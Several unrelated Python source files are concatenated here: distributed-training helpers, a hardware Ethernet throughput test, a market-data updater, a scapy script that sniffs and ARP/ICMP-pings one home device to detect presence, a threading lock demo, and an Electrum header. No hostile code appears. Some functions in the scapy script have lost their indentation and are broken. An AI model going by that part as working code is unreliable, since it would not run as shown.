    # This worker contributes 0; any peer that already finished contributes 1.
    flag = torch.tensor(0, device=cuda_device)
    dist.all_reduce(flag, dist.ReduceOp.SUM)
    if flag.item() == 0:
        return False
    logger.warning(
        f"Worker {dist.get_rank()} finishing training early! "
        "This implies that there is an imbalance in your training "
        "data across the workers and that some amount of it will be "
        "ignored. A small amount of this is fine, but a major imbalance "
        "should be avoided. Note: This warning will appear unless your "
        "data is perfectly balanced."
    )
    return True
def is_dist_done_on_epoch(cuda_device: torch.device) -> None:
    """
    Indicate that we're done so that any workers that have remaining data stop the epoch early.
    """
    logger.warning(f"Worker {dist.get_rank()} completed its entire epoch.")
    flag = torch.tensor(1, device=cuda_device)
    dist.all_reduce(flag, dist.ReduceOp.SUM)
    # At least this worker contributed 1, so the reduced value must be truthy.
    assert flag.item()
def on_batch_start(func: Callable) -> Callable:
    """Decorator for Trainer batch methods: before running the batch, check
    whether any other distributed worker has already exhausted its data.

    The wrapped method's result is returned as ``(output_dict, done_early)``.
    """
    @wraps(func)
    def wrapper(cls, *args, **kwargs):
        # NOTE(review): despite the name, ``cls`` is the Trainer *instance*
        # (the previous ``Type[T]`` annotation was misleading and is dropped).
        # Place import here to avoid circular imports
        from vae_lm.training.trainers import Trainer
        as_trainer = cast(Trainer, cls)
        # Only consult the process group when actually running distributed.
        done_early = (
            is_dist_done_early(as_trainer.cuda_device) if as_trainer.is_distributed() else False
        )
        output_dict = func(as_trainer, *args, **kwargs)
        return output_dict, done_early
    return wrapper
def on_epoch_end(func: Callable) -> Callable:
    """Decorator for Trainer epoch methods: if this worker consumed all of its
    data (``done_early`` is False), notify the other distributed workers so
    they can stop the epoch too.

    The wrapped method must return ``(loss, done_early)``; only ``loss`` is
    passed through to the caller.
    """
    @wraps(func)
    def wrapper(cls, *args, **kwargs):
        # NOTE(review): ``cls`` is the Trainer *instance*, not a type.
        # Place import here to avoid circular imports
        from vae_lm.training.trainers import Trainer
        as_trainer = cast(Trainer, cls)
        loss, done_early = func(as_trainer, *args, **kwargs)
        # Assertion
        if as_trainer.is_distributed() and not done_early:
            is_dist_done_on_epoch(as_trainer.cuda_device)
        return loss
    return wrapper
def setup_world(
    rank: int,
    world_size: int,
    backend: str = Backend.GLOO,
    master_addr: str = "127.0.0.1",
    master_port: int = 29500,
) -> None:
    """Join worker ``rank`` to the default process group of ``world_size``
    workers, rendezvousing over TCP at the master address/port."""
    endpoint = f"tcp://{master_addr}:{master_port}"
    # Initialize the process group
    dist.init_process_group(
        backend,
        init_method=endpoint,
        rank=rank,
        world_size=world_size,
    )
def dist_cleanup() -> None:
    """Tear down the default process group created by ``setup_world``."""
    # Clean processes
    dist.destroy_process_group()
# TODO: Work in progres
# It's not part of the work, just for fun :)))
# Want to implement distributed training with spawn and fork methods (Hogwild)
# (translated) Write a completely different training function; it would
# probably accept a Trainer and operate directly on it.  See PyTorch Lightning
# and best practices for PyTorch multiprocessing.
class DistributedTraining:
    """Work-in-progress wrapper intended to fan a worker callable out over
    ``world_size`` processes.

    NOTE(review): incomplete as written — ``self._accelerator`` is always
    ``None`` so ``run_ddp`` raises ``TypeError``, ``_ddp_spawn`` is a stub,
    and ``_ddp`` creates processes without starting or joining them.
    """
    def __init__(
        self,
        worker: Callable,
        # TODO: Make accelerators registrebale
        accelerator: str = "ddp_spawn",
        world_size: int = 1,
    ) -> None:
        self._worker = worker
        self._accelerator = None  # TODO: Pick one
        self._world_size = world_size

    def run_ddp(self, args: Tuple[Any]) -> None:
        # Delegates to the (not yet selected) accelerator strategy.
        self._accelerator(process=self._worker, args=args, world_size=self._world_size)

    def _ddp_spawn(self) -> None:
        # Stub: spawn-based strategy not implemented yet.
        pass

    def _ddp(self, args: Tuple[Any]) -> None:
        _mp = mp.get_context("spawn")
        proceses = []  # NOTE(review): typo, and never appended to / started
        for rank in range(self._world_size):
            # TODO: Probably send instantiated model to Process with vocab
            process = _mp.Process(target=self._worker, args=(rank, args, self._world_size), daemon=True)
            # starting all processes at once can cause issues
            # with dataloaders delay between 1-10 seconds
            # sleep(delay)
|
test_eth.py | import logging
import signal
import time
import datetime
# import random
from threading import Thread, Event # , Lock, Condition
from array import array
import struct
import numpy as np
from basil.dut import Dut
from basil.HL.RegisterHardwareLayer import RegisterHardwareLayer
conf = '''
name : test_eth
version : 1.0
transfer_layer:
- name : ETH
type : SiTcp
init:
ip : "192.168.10.16"
udp_port : 4660
tcp_port : 24
tcp_connection : True
tcp_to_bus : True
hw_drivers:
- name : SITCP_FIFO
type : sitcp_fifo
interface : ETH
- name : REGISTERS
type : test_eth
interface : ETH
base_addr : 0x0
'''
stop_thread = False
class test_eth(RegisterHardwareLayer):
    '''Register Hardware Layer.
    Implementation of advanced register operations.

    Register map of the firmware under test (addresses are byte offsets from
    base_addr, sizes in bits).  RESET and VERSION share address 0 with
    opposite access properties (writeonly vs readonly).
    '''
    _registers = {
        'RESET': {'descr': {'addr': 0, 'size': 8, 'properties': ['writeonly']}},
        'VERSION': {'descr': {'addr': 0, 'size': 8, 'properties': ['readonly']}},
        'SETUP': {'default': 0, 'descr': {'addr': 1, 'size': 8, 'offset': 0}},
        'TEST_DATA': {'descr': {'addr': 2, 'size': 64, 'offset': 0}},
        'UDP_WRITE_CNT': {'descr': {'addr': 10, 'size': 32, 'offset': 0}},
        'TCP_WRITE_DLY': {'default': 0, 'descr': {'addr': 14, 'size': 16, 'offset': 0}},
        'TCP_WRITE_CNT': {'descr': {'addr': 16, 'size': 64, 'offset': 0, 'properties': ['readonly']}},
        'TCP_FAILED_WRITE_CNT': {'descr': {'addr': 24, 'size': 64, 'offset': 0, 'properties': ['readonly']}},
        'TCP_RECV_WRITE_CNT': {'descr': {'addr': 32, 'size': 64, 'offset': 0, 'properties': ['readonly']}}
    }
class Test(object):
    """Drives the TCP/UDP throughput-and-integrity test against the firmware
    described by ``conf``: a monitor thread reports transfer speeds, a TCP
    thread checks that the streamed counter increases by exactly one per
    32-bit word, and a UDP thread write/read-verifies the TEST_DATA register.
    Ctrl-C (or ``deadline``) stops the run and prints statistics."""

    def __init__(self):
        self.dut = Dut(conf)
        self.dut.init()
        # fw_version = dut['ETH'].read(0x0000, 1)[0]
        logging.info("Firmware version: %s" % self.dut['REGISTERS'].VERSION)
        signal.signal(signal.SIGINT, self.signal_handler)
        logging.info('Press Ctrl-C to stop')
        self.stop_thread = Event()
        self.total_tcp_err_cnt = 0

    def signal_handler(self, signum, frame):
        # First Ctrl-C: stop TCP data generation, record the stop time, and
        # let the worker threads drain; restore the default handler so a
        # second Ctrl-C kills the process outright.
        logging.info('Pressed Ctrl-C...')
        self.dut['REGISTERS'].TCP_WRITE_DLY = 0  # no TCP data
        self.time_stop = time.time()
        self.stop_thread.set()
        signal.signal(signal.SIGINT, signal.SIG_DFL)  # setting default handler

    def start(self, test_tcp=True, test_udp=True, tcp_write_delay=6, monitor_interval=1.0, deadline=None):
        """Run the selected tests until Ctrl-C or ``deadline`` seconds elapse,
        then join the threads and log summary statistics."""
        if not test_tcp and not test_udp:
            return
        self.test_tcp = test_tcp
        self.test_udp = test_udp
        # reset registers
        # NOTE(review): attribute *read* of a writeonly register -- confirm
        # this actually triggers the reset in basil.
        self.dut['REGISTERS'].RESET
        # setup register values
        # Monitor
        self.monitor_delay = monitor_interval  # Speed of displaying netowrk speed
        # TCP
        self.tcp_readout_delay = 0.1  # Delay between reading TCP buffer
        self.dut['REGISTERS'].TCP_WRITE_DLY = 0  # no TCP data
        self.time_start = time.time()
        self.total_tcp_err_cnt = 0
        self.total_tcp_data_words_read = 0
        self.tcp_exception_cnt = 0
        self.tcp_read_speeds = None
        # UDP
        self.udp_readout_delay = 0.0  # Delay between reading/writing UDP
        self.total_udp_err_cnt = 0
        self.total_udp_read_write_cnt = 0
        self.udp_exception_cnt = 0
        self.udp_read_write_speeds = None
        # initializing threads
        self.stop_thread.clear()
        self.mon_t = Thread(target=self.monitor, name='Monitor thread', kwargs={})
        self.mon_t.daemon = True
        self.mon_t.start()
        if test_tcp:
            self.tcp_t = Thread(target=self.tcp_read, name='TCP thread', kwargs={})
            self.tcp_t.daemon = True
            self.tcp_t.start()
        if test_udp:
            self.udp_t = Thread(target=self.udp_read_write, name='UDP thread', kwargs={})
            self.udp_t.daemon = True
            self.udp_t.start()
        if test_tcp:
            self.dut['REGISTERS'].TCP_WRITE_DLY = tcp_write_delay  # set TCP write delay: 1 equivalent to write data every clock cycle (1/133MHz=0.0075us=7.5ns)
        self.time_start = time.time()
        self.time_stop = self.time_start + 1.0
        # while loop for signal handler
        while not self.stop_thread.wait(0.05):
            if deadline and self.time_start + deadline < time.time():
                self.signal_handler(None, None)
        self.mon_t.join()
        self.mon_t = None
        logging.info("Stopped Monitor thread")
        if test_tcp:
            self.tcp_t.join()
            self.tcp_t = None
            logging.info("Stopped TCP thread")
        if test_udp:
            self.udp_t.join()
            self.udp_t = None
            logging.info("Stopped UDP thread")
        # some statistics
        logging.info("Total time: %s" % (str(datetime.timedelta(seconds=self.time_stop - self.time_start))))
        if test_tcp:
            logging.info("=== TCP transfer statistics ===")
            logging.info("TCP data error counter: %d" % self.total_tcp_err_cnt)
            logging.info("TCP exception counter: %d" % self.tcp_exception_cnt)
            logging.info("TCP write busy counter: %d" % self.dut['REGISTERS'].TCP_FAILED_WRITE_CNT)
            logging.info("TCP data words: read: %d, expected: %d" % (self.dut['REGISTERS'].TCP_WRITE_CNT * 4 + self.dut['REGISTERS'].TCP_RECV_WRITE_CNT, self.total_tcp_data_words_read * 4))
            if self.total_tcp_data_words_read * 4 / 10.0**6 > 1000000:
                logging.info("Total amount transmitted: %.2f TB" % (self.total_tcp_data_words_read * 4 / 10.0**12))
            elif self.total_tcp_data_words_read * 4 / 10.0**6 > 1000:
                logging.info("Total amount transmitted: %.2f GB" % (self.total_tcp_data_words_read * 4 / 10.0**9))
            else:
                logging.info("Total amount transmitted: %.2f MB" % (self.total_tcp_data_words_read * 4 / 10.0**6))
            total_tcp_avg_read_speed = self.total_tcp_data_words_read * 32 / (self.time_stop - self.time_start) / 10.0**6
            if total_tcp_avg_read_speed < 1.0:
                logging.info("Total average TCP read speed: %.2f kbit/s" % (total_tcp_avg_read_speed * 10**3))
            else:
                logging.info("Total average TCP read speed: %.2f Mbit/s" % (total_tcp_avg_read_speed))
            if self.tcp_read_speeds:
                if np.average(self.tcp_read_speeds) < 1.0:
                    logging.info("TCP read speed (min/median/average/max): %.2f/%.2f/%.2f/%.2f kbit/s" % (np.min(self.tcp_read_speeds) * 10**3, np.median(self.tcp_read_speeds) * 10**3, np.average(self.tcp_read_speeds) * 10**3, np.max(self.tcp_read_speeds) * 10**3))
                else:
                    logging.info("TCP read speed (min/median/average/max): %.2f/%.2f/%.2f/%.2f Mbit/s" % (np.min(self.tcp_read_speeds), np.median(self.tcp_read_speeds), np.average(self.tcp_read_speeds), np.max(self.tcp_read_speeds)))
        if test_udp:
            logging.info("=== UDP transfer statistics ===")
            logging.info("UDP data error counter: %d" % self.total_udp_err_cnt)
            logging.info("UDP exception counter: %d" % self.udp_exception_cnt)
            logging.info("UDP read/write counter: read: %d, expected: %d" % (self.dut['REGISTERS'].UDP_WRITE_CNT, self.total_udp_read_write_cnt * 8))
            if self.total_udp_read_write_cnt * 8 / 10.0**6 > 1000000:
                logging.info("Total amount transmitted: %.2f TB" % (self.total_udp_read_write_cnt * 8 / 10.0**12))
            elif self.total_udp_read_write_cnt * 8 / 10.0**6 > 1000:
                logging.info("Total amount transmitted: %.2f GB" % (self.total_udp_read_write_cnt * 8 / 10.0**9))
            else:
                logging.info("Total amount transmitted: %.2f MB" % (self.total_udp_read_write_cnt * 8 / 10.0**6))
            total_udp_avg_read_speed = self.total_udp_read_write_cnt * 64 / (self.time_stop - self.time_start) / 10.0**6
            if total_udp_avg_read_speed < 1.0:
                logging.info("Total average UDP read/write speed: %.2f kbit/s" % (total_udp_avg_read_speed * 10**3))
            else:
                logging.info("Total average UDP read/write speed: %.2f Mbit/s" % (total_udp_avg_read_speed))
            if self.udp_read_write_speeds:
                if np.average(self.udp_read_write_speeds) < 1.0:
                    logging.info("UDP read/write speed (min/median/average/max): %.2f/%.2f/%.2f/%.2f kbit/s" % (np.min(self.udp_read_write_speeds) * 10**3, np.median(self.udp_read_write_speeds) * 10**3, np.average(self.udp_read_write_speeds) * 10**3, np.max(self.udp_read_write_speeds) * 10**3))
                else:
                    logging.info("UDP read/write speed (min/median/average/max): %.2f/%.2f/%.2f/%.2f Mbit/s" % (np.min(self.udp_read_write_speeds), np.median(self.udp_read_write_speeds), np.average(self.udp_read_write_speeds), np.max(self.udp_read_write_speeds)))
        # close DUT
        self.dut.close()

    def monitor(self):
        """Thread body: log per-interval TCP/UDP speeds; abort the whole run
        if more than 10 data errors have accumulated on either channel."""
        logging.info("Started Monitor thread")
        time_read = time.time()
        last_total_tcp_data_words_read = 0
        last_total_udp_read_write_cnt = 0
        while not self.stop_thread.wait(max(0.0, self.monitor_delay - time_read + time.time())):
            tmp_time_read = time.time()
            tmp_total_tcp_data_words_read = self.total_tcp_data_words_read
            tmp_total_udp_read_write_cnt = self.total_udp_read_write_cnt
            if self.test_tcp:
                tcp_read_speed = (tmp_total_tcp_data_words_read - last_total_tcp_data_words_read) * 32 / (tmp_time_read - time_read) / 10**6
                if self.tcp_read_speeds is None:  # add on second iteration
                    self.tcp_read_speeds = []
                else:
                    self.tcp_read_speeds.append(tcp_read_speed)
                if tcp_read_speed < 1.0:
                    logging.info("TCP read speed: %0.2f kbit/s" % (tcp_read_speed * 10**3))
                else:
                    logging.info("TCP read speed: %0.2f Mbit/s" % tcp_read_speed)
            if self.test_udp:
                udp_read_write_speed = (tmp_total_udp_read_write_cnt - last_total_udp_read_write_cnt) * 64 / (tmp_time_read - time_read) / 10**6
                if self.udp_read_write_speeds is None:  # add on second iteration
                    self.udp_read_write_speeds = []
                else:
                    self.udp_read_write_speeds.append(udp_read_write_speed)
                if udp_read_write_speed < 1.0:
                    logging.info("UDP read/write speed: %0.2f kbit/s" % (udp_read_write_speed * 10**3))
                else:
                    logging.info("UDP read/write speed: %0.2f Mbit/s" % udp_read_write_speed)
            time_read = tmp_time_read
            last_total_tcp_data_words_read = tmp_total_tcp_data_words_read
            last_total_udp_read_write_cnt = tmp_total_udp_read_write_cnt
            if self.total_udp_err_cnt > 10 or self.total_tcp_err_cnt > 10:
                self.stop_thread.set()
        logging.info("Stopping Monitor thread...")

    def tcp_read(self):
        """Thread body: drain the TCP FIFO and check that the received 32-bit
        words form a strictly +1-incrementing sequence, both inside a readout
        and across readout boundaries."""
        logging.info("Started TCP thread")
        fifo_data_last_value = -1
        fifo_was_empty = 0
        time_read = time.time()
        # Keep reading after stop is requested until the FIFO was seen empty once.
        while not self.stop_thread.wait(max(0.0, self.tcp_readout_delay - time_read + time.time())) or fifo_was_empty < 1:
            time_read = time.time()
            try:
                fifo_data = self.dut['SITCP_FIFO'].get_data()
            except Exception as e:
                logging.error(e)
                self.tcp_exception_cnt += 1
            else:
                if fifo_data.shape[0]:
                    self.total_tcp_data_words_read += fifo_data.shape[0]
                    if fifo_data[0] != fifo_data_last_value + 1:
                        logging.warning("TCP not increased by 1 between readouts")
                        self.total_tcp_err_cnt += 1
                    err_cnt = np.count_nonzero(np.diff(fifo_data) != 1)
                    if err_cnt:
                        logging.warning("TCP data not increased by 1: errors=%d" % err_cnt)
                        self.total_tcp_err_cnt += err_cnt
                    fifo_data_last_value = fifo_data[-1]
                elif self.stop_thread.is_set():
                    fifo_was_empty += 1
            if self.stop_thread.is_set():
                time.sleep(max(0.0, self.tcp_readout_delay - time_read + time.time()))
        logging.info("Stopping TCP thread...")

    def udp_read_write(self):
        """Thread body: write a random 64-bit value to TEST_DATA over UDP,
        read it back, and count mismatches and exceptions."""
        logging.info("Started UDP thread")
        time_read = time.time()
        while not self.stop_thread.wait(max(0.0, self.udp_readout_delay - time_read + time.time())):
            time_read = time.time()
            write_value = int(np.random.randint(2**64, size=None, dtype=np.uint64))  # random.randint(0, 2**64 - 1)
            try:
                self.dut['REGISTERS'].TEST_DATA = write_value
            except Exception as e:
                logging.error(e)
                self.udp_exception_cnt += 1
            else:
                try:
                    read_value = self.dut['REGISTERS'].TEST_DATA
                except Exception as e:
                    logging.error(e)
                    self.udp_exception_cnt += 1
                else:
                    self.total_udp_read_write_cnt += 1
                    if read_value != write_value:
                        logging.warning("UDP data not correct: read: %s, expected: %s" % (array('B', struct.unpack("BBBBBBBB", struct.pack("Q", read_value))), array('B', struct.unpack("BBBBBBBB", struct.pack("Q", write_value)))))
                        self.total_udp_err_cnt += 1
        logging.info("Stopping UDP thread...")
if __name__ == "__main__":
    import argparse
    # BUG FIX: the usage example now matches the options that actually exist
    # (the old text showed "-t", "--no-udp" and "--no-tcp", none of which are
    # accepted by this parser).
    parser = argparse.ArgumentParser(description='Testing MMC3 Ethernet Interface %s\nExample: python test_eth.py -i 1.0 -d 6 --no_udp --no_tcp', formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument('-w', '--deadline', type=float, metavar='<deadline>', action='store', help='timeout in seconds before application exits')
    parser.add_argument('-i', '--interval', type=float, metavar='<interval time>', action='store', help='time interval in seconds for the monitor')
    parser.add_argument('-d', '--delay', type=int, metavar='<clock cycles>', action='store', help='clock cycles between TCP writes')
    parser.add_argument('--no_udp', dest='no_udp', action='store_true', help='disable UDP tests')
    parser.add_argument('--no_tcp', dest='no_tcp', action='store_true', help='disable TCP tests')
    # NOTE: removed stray parser.set_defaults(no_m26_jtag_configuration=False)
    # left over from another script; nothing in this file reads it.
    args = parser.parse_args()
    # Only forward options the user actually supplied so Test.start() keeps
    # its own defaults for the rest.
    config = {}
    if args.deadline is not None:
        config["deadline"] = args.deadline
    if args.interval is not None:
        config["monitor_interval"] = args.interval
    if args.delay is not None:
        config["tcp_write_delay"] = args.delay
    if args.no_udp:
        config["test_udp"] = False
    if args.no_tcp:
        config["test_tcp"] = False
    test = Test()
    test.start(**config)
|
update_ohlc.py | import os
import sys
from multiprocessing import Process
sys.path.append('src')
from DataSource import IEXCloud, Polygon # noqa autopep8
from Constants import PathFinder, POLY_CRYPTO_SYMBOLS, FEW_DAYS # noqa autopep8
import Constants as C # noqa autopep8
# Provider clients: IEX Cloud for stocks; Polygon.io (API key from the
# POLYGON env var) for stocks and crypto.
iex = IEXCloud()
poly = Polygon(os.environ['POLYGON'])
# Universe to update: every IEX stock symbol plus the fixed crypto list.
stock_symbols = iex.get_symbols()
crypto_symbols = POLY_CRYPTO_SYMBOLS
all_symbols = stock_symbols + crypto_symbols
# Double redundancy
# 1st pass
def update_iex_ohlc():
    """First pass: refresh 1-day OHLC data from IEX Cloud for every stock.

    Best-effort per symbol: failures are logged and the loop continues.
    """
    for symbol in stock_symbols:
        retries = 1 if C.TEST else C.DEFAULT_RETRIES
        try:
            iex.save_ohlc(symbol=symbol, timeframe='1d', retries=retries)
        except Exception as e:
            print(f'IEX Cloud OHLC update failed for {symbol}.')
            print(e)
        finally:
            path = PathFinder().get_ohlc_path(symbol=symbol, provider=iex.provider)
            # On CI we only exercise the code path; don't keep the artifacts.
            if C.CI and os.path.exists(path):
                os.remove(path)
# 2nd pass
def update_poly_ohlc():
    """Second pass: refresh multi-day OHLC data from Polygon.io for all
    symbols (stocks and crypto).

    Best-effort per symbol: failures are logged and the loop continues.
    """
    for symbol in all_symbols:
        try:
            poly.save_ohlc(symbol=symbol, timeframe=FEW_DAYS, retries=1)
        except Exception as e:
            print(f'Polygon.io OHLC update failed for {symbol}.')
            print(e)
        finally:
            path = PathFinder().get_ohlc_path(symbol=symbol, provider=poly.provider)
            # On CI we only exercise the code path; don't keep the artifacts.
            if C.CI and os.path.exists(path):
                os.remove(path)
# Run both passes in parallel processes; join so the script only exits when
# both have finished.
p1 = Process(target=update_iex_ohlc)
p2 = Process(target=update_poly_ohlc)
p1.start()
p2.start()
p1.join()
p2.join()
|
scapy-watch.py | #!/usr/bin/env python
"""
Proof of concept for monitoring network for setting home automation use
not ready for prime time of any kind
"""
__author__ = "Peter Shipley"
from scapy.all import *
from threading import Thread
import ISY
import time
import socket
import signal
# ---- module configuration / mutable state (overridden by parse_args) ----
verbose=1
conf.verb=1  # scapy verbosity
import argparse

last_seen = dict()      # MAC address -> unix time of last sighting
targets_dict = dict()   # NOTE(review): never used below -- confirm before removing
iface="em0" # eth0
myisy = None            # ISY controller handle, set in do_it()
target_var="is_home"    # ISY variable updated with presence state
isy_var=None
target_ip="10.1.1.104"
target_mac="60:be:b5:ad:28:2d"
#target_mac=None
time_fmt="%Y-%m-%d %H:%M:%S"
event_thread = None     # background ping_loop thread

# Timing knobs (seconds): poll interval, silence before re-probe, silence
# before declaring the target away.
time_sleep=300
time_recheck=600
time_away=900
#time_sleep=60
#time_recheck=120
#time_away=300
is_home=-1              # -1 = unknown; forces the first set_home() to publish
# pcap_filter="arp and ether src 60:be:b5:ad:28:2d"
# print time.asctime( time.localtime())
def Exit_gracefully(signal, frame):
print "Exiting in a Graceful way"
is_home=-1 # assert not home
set_home(False)
sys.exit(0)
def set_home(state) :
global is_home
global isy_var
if state == is_home :
return
is_home = state
if is_home :
isy_var.value = 1
else :
isy_var.value = 0
print "\n>>>>", time.strftime(time_fmt, time.localtime()), " is_home = ", is_home, "\n"
def arp_monitor_callback(pkt):
global target_ip
global target_mac
global last_seen
eaddr = None
t = time.strftime(time_fmt, time.localtime())
if ARP in pkt and pkt[ARP].op in (1,2): #who-has or is-at
eaddr = pkt[ARP].hwsrc
if target_ip is None :
target_ip = pkt[ARP].pdst
print "arp_mon set target_ip = ", target_ip
pktinfo = pkt.sprintf("{0}\t%ARP.hwsrc% %ARP.psrc% %ARP.op% %ARP.pdst%".format(t))
elif TCP in pkt :
eaddr = pkt[Ether].src
pktinfo = pkt.sprintf("{0}\tTCP %Ether.src% %Ether.dst% %IP.src%:%TCP.sport% %IP.dst%:%TCP.dport%".format(t))
set_home(True)
elif UDP in pkt :
eaddr = pkt[Ether].src
pktinfo = pkt.sprintf("{0}\t%IP.proto% %Ether.src% %Ether.dst% %IP.src%:%UDP.sport% %IP.dst%:%UDP.dport%".format(t))
elif IP in pkt :
eaddr = pkt[Ether].src
pktinfo = pkt.sprintf("{0}\t%IP.proto% %Ether.src% %Ether.dst% %IP.src% %IP.dst%".format(t))
elif Ether in pkt :
eaddr = pkt[Ether].src
pktinfo = pkt.sprintf("{0}\t%Ether.src% %Ether.dst% ".format(t))
elif "802.3" in pkt :
eaddr = pkt[802.3].src
pktinfo = pkt.sprintf("{0}\t802.3 %802.3.src% %802.3.dst% ".format(t))
else :
pkt.show()
return "???"
set_home(True)
prev_seen = last_seen[eaddr]
last_seen[eaddr] = int(time.time())
if verbose :
time_since = last_seen[eaddr] - prev_seen
print "Time_since = {0} sec = {1} min {2} sec".format(
time_since,
*divmod( time_since , 60) )
# int(time_since/60),
#int(time_since%60)
#)
return pktinfo
def icmp_ping(ip) :
    """ICMP-echo the target; returns scapy's (answered, unanswered) lists,
    or (None, None) when no IP is known.

    Side effect: learns target_mac from the first reply when it is unknown.
    """
    global target_mac
    if ip is None :
        return (None,None)
    if target_mac is None :
        ans,unans=srp(Ether()/IP(dst=ip)/ICMP(), timeout=2)
    else :
        # Address the frame directly once the MAC is known.
        ans,unans=srp(Ether(dst=target_mac)/IP(dst=ip)/ICMP(), timeout=2)
    print "icmp_ping : ", ip, " ans = ", len(ans), ", unans = ", len(unans)
    if target_mac is None and ans :
        (so,re) = ans[0]
        target_mac = re[Ether].src
        print "icmp_ping set target_mac = ", target_mac
    return ans,unans
def arp_ping(ip) :
    """Broadcast an ARP who-has for the target; returns scapy's
    (answered, unanswered) lists, or (None, None) when no IP is known.

    Side effect: learns target_mac from the first reply when it is unknown.
    """
    global target_mac
    if ip is None :
        return (None,None)
    ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip),
        timeout=2, retry=2)
    print "arp_ping : ", ip, " ans = ", len(ans), ", unans = ", len(unans)
    if target_mac is None and ans :
        (so,re) = ans[0]
        target_mac = re[Ether].src
        print "arp_ping set target_mac = ", target_mac
    return (ans,unans)
#
# Send arp and/or pings if we have not heard from the target recently
#
def ping_loop() :
    """Background thread body: periodically re-probe the target when passive
    sniffing has been quiet for time_recheck seconds, and flip is_home to
    False once it has been silent for time_away seconds.

    NOTE(review): original indentation was lost; the nesting below (probes
    inside the time_recheck branch) is the reconstruction that matches the
    ``continue`` -- confirm against the original source.
    """
    global target_mac
    global target_ip
    global last_seen
    print "\nping_loop init"
    arp_a, arp_u = arp_ping(target_ip)
    arping(target_ip)
    if len(arp_a) < 1 :
        icmp_a,icmp_u = icmp_ping(target_ip)
    # Short-circuit: icmp_a is only evaluated when arp_a is empty, i.e. when
    # the branch above has defined it.
    if arp_a or icmp_a :
        set_home(True)
        last_seen[target_mac] = int(time.time())
    print "\nping_loop start"
    while True :
        time.sleep(time_sleep)
        print "sleep complete",
        time_now = int(time.time())
        time_since = time_now - last_seen[target_mac]
        if time_since >= time_recheck :
            print "arp_pinging",
            a, u = arp_ping(target_ip)
            if len(a) < 1 :
                a, u = icmp_ping(target_ip)
            if len(a) :
                set_home(True)
                last_seen[target_mac] = int(time.time())
                continue
            time.sleep(5)
            time_since = time_now - last_seen[target_mac]
        if time_since >= time_away :
            print "last_seen = {0}".format(
                time.strftime(time_fmt,
                    time.localtime(last_seen[target_mac])))
            print "time_since = {0} sec = {1} min {2} sec".format(
                time_since,
                *divmod( time_since , 60) )
            set_home(False)
def do_it() :
global target_mac
global target_ip
global last_seen
global event_thread
global myisy
global isy_var
print "Starting : {0}".format(time.strftime(time_fmt, time.localtime()))
myisy = ISY.Isy(parsearg=1, faststart=1) # debug=0x80
if verbose :
print "time_sleep=", ( time_sleep / 60 )
print "time_recheck=", ( time_recheck / 60 )
print "time_away=", ( time_away / 60 )
isy_var = myisy.get_var(target_var)
print "isy_var = {:<4} : {:<19}{:<5}\t{:<5}\t{:}".format(
isy_var.id, isy_var.name, isy_var.value, isy_var.init, isy_var.ts )
signal.signal(signal.SIGINT, Exit_gracefully)
if target_mac is None :
ans,unans = icmp_ping(target)
if ans :
(so,re) = ans[0]
target_mac = re[Ether].src
print "target_mac = ", target_mac
assert( target_mac is not None )
pcap_filter="ether src {0}".format(target_mac)
last_seen[target_mac] = 0
event_thread = Thread(target=ping_loop, name="ping_looper" )
event_thread.daemon = True
event_thread.start()
print "sniff loop"
time.sleep(1)
# tcpdump -i em0 -v -v ether src 60:be:b5:ad:28:2d
sniff(prn=arp_monitor_callback, iface="em0", filter=pcap_filter, store=0)
def parse_args() :
    """Parse command-line options and overwrite the module-level defaults
    (target_ip, target_mac, target_var, iface) with any supplied values."""
    global target_mac
    global target_ip
    global target_var
    global iface
    parser = argparse.ArgumentParser()
    parser.add_argument("-m", "--mac", dest="target_mac",
        default="60:be:b5:ad:28:2d",
        help="Target Mac")
    parser.add_argument("-a", "--addr", dest="target_ip",
        default="10.1.1.104",
        help="Target IP Addr")
    parser.add_argument("-v", "--var", dest="target_var",
        default="is_home",
        help="Target ISY Var")
    parser.add_argument("-i", "--interface", dest="iface",
        default=None,
        help="Network Interface")
    # parse_known_args: ignore options meant for other consumers (e.g. ISY).
    opts, _unknown = parser.parse_known_args()
    for attr in ("target_ip", "target_mac", "target_var", "iface"):
        val = getattr(opts, attr)
        if val :
            globals()[attr] = val
if __name__ == '__main__' :
    # Apply CLI overrides first, then run the monitor until SIGINT.
    parse_args()
    do_it()
    exit(0)
|
lock_or_mutex.py | """
Use a lock (mutex) to synchronize access to a shared resource.
"""
import threading, time, random

# Shared state: 'counter' is the resource every worker mutates; 'lock'
# serializes access to it.
counter = 0
lock = threading.Lock()  # lock used to gain exclusive access to the shared resource
def worker(name):
    """Increment the shared 'counter' ten times under the module lock.

    The read / sleep / write-back sequence is the classic race-condition
    window; holding the lock across all of it makes the update safe.
    """
    global counter
    for _ in range(10):
        # FIX/idiom: use the lock as a context manager so it is released even
        # if the critical section raises (the original bare acquire()/release()
        # pair would leave the lock held forever on an exception).
        with lock:
            c = counter                   # critical code, possible race condition
            time.sleep(random.random())   # critical code, possible race condition
            counter = c + 1               # critical code, possible race condition
            print(f"{name}: {counter}")   # critical code, possible race condition
# Start one worker thread per name, then wait for all of them to finish.
threads = []
for i in ['budi', 'susi', 'iwan']:
    thread = threading.Thread(target=worker, args=(i,))
    thread.start()
    threads.append(thread)
for t in threads:
    t.join()
# With the lock, each of the 3 workers adds exactly 10, so this prints 30.
print(f"counter: {counter}")
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
